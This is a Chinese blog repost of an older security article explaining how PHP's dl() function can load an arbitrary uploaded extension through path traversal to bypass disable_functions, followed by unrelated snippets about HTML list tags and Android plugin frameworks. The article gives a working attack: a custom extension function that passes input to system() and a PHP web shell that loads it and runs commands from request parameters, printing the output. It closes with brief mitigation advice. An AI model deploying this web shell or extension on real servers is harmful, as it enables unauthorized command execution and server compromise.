php dl函数

转载 2012年03月22日 18:34:32

今天一时兴起想看看dl函数的作用,网上搜了一篇文章,感觉很好,先留下了。

--以下来自:http://www.pmal.net/viewthread.php?tid=8871

利用dl函数突破disable_functions执行命令

FROM: xfocus.net
创建时间:2007-04-19
文章提交:T_Torchidy (jnchaha_at_163.com)

PHP 是一款功能强大应用广泛的脚本语言,很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的功能,所以大部分的服务器都对 PHP做了严格的限制,包括使用open_basedir限制可以操作的目录以及使用disable_functions限制程序使用一些可以直接执行系统命令的函数如system,exec,passthru,shell_exec,proc_open等等。但是如果服务器没有对dl()函数做限制,一样可以利用dl()函数饶过这些限制。
dl()函数允许在php脚本里动态加载php模块,默认是加载extension_dir目录里的扩展,该选项是PHP_INI_SYSTEM 范围可修改的,只能在php.ini或者apache主配置文件里修改。当然,你也可以通过enable_dl选项来关闭动态加载功能,而这个选项默认为 On的,事实上也很少人注意到这个。dl()函数在设计时存在安全漏洞,可以用../这种目录遍历的方式指定加载任何一个目录里的so等扩展文件, extension_dir限制可以被随意饶过。所以我们可以上传自己的so文件,并且用dl函数加载这个so文件然后利用so文件里的函数执行其他操作,包括系统命令。
复制内容到剪贴板
代码:
PHP_FUNCTION(dl)
{
pval **file;

#ifdef ZTS
if ((strncmp(sapi_module.name, "cgi", 3)!=0) &&
       (strcmp(sapi_module.name, "cli")!=0) &&
       (strncmp(sapi_module.name, "embed", 5)!=0)) {
       php_error_docref(NULL TSRMLS_CC, E_WARNING, "Not supported in multithreaded Web servers - use extension statements in your php.ini");
       RETURN_FALSE;
}          //验证是否可以使用dl函数,在多线程web服务器里是禁止的
#endif

/* obtain arguments */
if (ZEND_NUM_ARGS() != 1 || zend_get_parameters_ex(1, &file) == FAILURE) {
       WRONG_PARAM_COUNT;
}

convert_to_string_ex(file);    //取得参数

if (!PG(enable_dl)) {
       php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extentions aren't enabled");//验证是否enable_dl,默认为on
} else if (PG(safe_mode)) {
       php_error_docref(NULL TSRMLS_CC, E_WARNING, "Dynamically loaded extensions aren't allowed when running in Safe Mode");//验证是否safe_mode打开
} else {
       php_dl(*file, MODULE_TEMPORARY, return_value TSRMLS_CC);   //开始调用加载
       EG(full_tables_cleanup) = 1;
}
下面是开始处理模块的加载
复制内容到剪贴板
代码:
void php_dl(pval *file, int type, pval *return_value TSRMLS_DC)
{
void *handle;
char *libpath;
zend_module_entry *module_entry, *tmp;
zend_module_entry *(*get_module)(void);
int error_type;
char *extension_dir;          //定义一些变量
      
if (type==MODULE_PERSISTENT) {
       /* Use the configuration hash directly, the INI mechanism is not yet initialized */
       if (cfg_get_string("extension_dir", &extension_dir)==FAILURE) {
         extension_dir = PHP_EXTENSION_DIR;
       }
} else {
       extension_dir = PG(extension_dir);
}                      //取得php.ini里的设置也就是extension_dir的目录

if (type==MODULE_TEMPORARY) {
       error_type = E_WARNING;
} else {
       error_type = E_CORE_WARNING;
}

if (extension_dir && extension_dir[0]){
       int extension_dir_len = strlen(extension_dir);

       libpath = emalloc(extension_dir_len+Z_STRLEN_P(file)+2);

       if (IS_SLASH(extension_dir[extension_dir_len-1])) {
         sprintf(libpath, "%s%s", extension_dir, Z_STRVAL_P(file)); /* SAFE */
       } else {
         sprintf(libpath, "%s%c%s", extension_dir, DEFAULT_SLASH, Z_STRVAL_P(file)); /* SAFE */
       }                    //构造最终的so文件的位置,只是简单的附加,并没有对传入的参数做任何检查,包括open_basedir等
} else {
       libpath = estrndup(Z_STRVAL_P(file), Z_STRLEN_P(file));
}
/* load dynamic symbol */
handle = DL_LOAD(libpath);          //开始真正的调用了
看到了吧,我们可以调用任意的so了哦!下一步就是编写自己的so模块,并且调用他。按照官方提供的模块编写方法,我写了个很简单的,主要的导出函数loveshell如下:
复制内容到剪贴板
代码:
PHP_FUNCTION(loveshell)

{
       char *command;
       int command_len;

       if (ZEND_NUM_ARGS() != 1 || zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,"s", &command, &command_len) == FAILURE) {
      WRONG_PARAM_COUNT;
       }
       system(command);
       zend_printf("I recieve %s",command);
}
注意由于php4和php5的结构不一样,所以如果想要能顺利调用扩展,那么在php4环境下就要将上面的代码放到php4环境下编译,php5的就要在php5环境下编译。我们将编写好的扩展上传到服务器,就可以利用下面的代码执行命令了:
复制内容到剪贴板
代码:
   <?php
dl('../../../../../../../../../www/users/www.cnbct.org/loveshell.so');
$cmd=$_REQUEST[c]." 2>&1>tmp.txt";
loveshell($cmd);
echo "";
echo file_get_contents('tmp.txt');
?>
所以如果想保证服务器的安全,请将这个函数加到disable_functions里或者将安全模式打开吧,在安全模式下dl函数是无条件禁止的!:)

dl dt dd的嵌套使用

dl dt dd的嵌套使用 dd元素中可以包含block元素,而dt中只能包含inline元素, 在dd中可以包含dl元素 效果是这样的,主要的是效果是在dd中加了一个表格,如果使用表格来实...
  • sunbingzibo
  • sunbingzibo
  • 2016年01月24日 22:22
  • 2129

php 替代被弃用函数的

下面列举了部分被弃用的函数:      call_user_method()(使用 call_user_func() 替代)      call_user_method_array() (使用 c...
  • alpha_xiao
  • alpha_xiao
  • 2017年04月14日 10:53
  • 407

DIV+CSS中标签dl dt dd常用的用法

用来创建一个普通的列表, 用来创建列表中的上层项目, 用来创建列表中最下层项目, 和都必须放在标志对之间。   实例一: 效果:   源码: body{ fo...
  • simaweier
  • simaweier
  • 2014年11月13日 11:08
  • 42623

关于<dl>的居中

上午遇到了一个问题,里面的无法居中。 给添加样式align:center 、align-self:center等等都试过了都不管用。 上网百度了下,有建议说: 给dl添加一个类.ce...
  • WangSiTeng
  • WangSiTeng
  • 2015年11月13日 10:29
  • 1465

APK动态加载框架DL库分析

APK动态加载框架 知识点拓展: Android中插件开发篇之----应用换肤原理解析 http://blog.csdn.net/jiangwei0910410003/article/details...
  • xiangyunwan
  • xiangyunwan
  • 2016年05月19日 10:01
  • 775

HTML之dl、dt、dd(也许这是你还没用过的标签,但它们非常实用)

一、dl dt dd认识 html 是一组合标签,使用了dt dd最外层就必须使用dl包裹,此组合标签我们也又叫表格标签,与table表格类似组合标签,故名我们也叫dl表格(扩展阅读:tab...
  • u014326381
  • u014326381
  • 2015年08月27日 15:12
  • 1695

DL,DT,DD,比传统table更语义,解析更快的table列表方式

使用dl,dt,dd替代传统的table布局 -dl dt dd表格 dl,dt,dd{ margin:0; background:#fff5fa; font-siz...
  • yaerfeng
  • yaerfeng
  • 2013年08月24日 09:52
  • 3979

div学习之div中dl-dt-dd的详解

dl dt dd认识及dl dt dd使用方法  标签用于定义列表类型标签。 dl dt dd目录 dl dt dd介绍结构语法dl dt dd案例dl dt dd总结 一、dl dt...
  • u013700340
  • u013700340
  • 2014年04月10日 20:22
  • 887

dl插件框架 - 《Andriod必备技能》

DLTest百度dl框架研究学习demogithub:https://github.com/andoop/DLTest关于dl框架 插件加载框架 与DLoad(动态加载,我的另一个工程)原理一样,但是...
  • andoop
  • andoop
  • 2016年09月02日 15:23
  • 746

Android动态加载框架DL的架构与基本原理解析

动态加载框架DL的基本结构、原理解析
  • bboyfeiyu
  • bboyfeiyu
  • 2015年01月11日 18:03
  • 4753
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:php dl函数
举报原因:
原因补充:

(最多只允许输入30个字)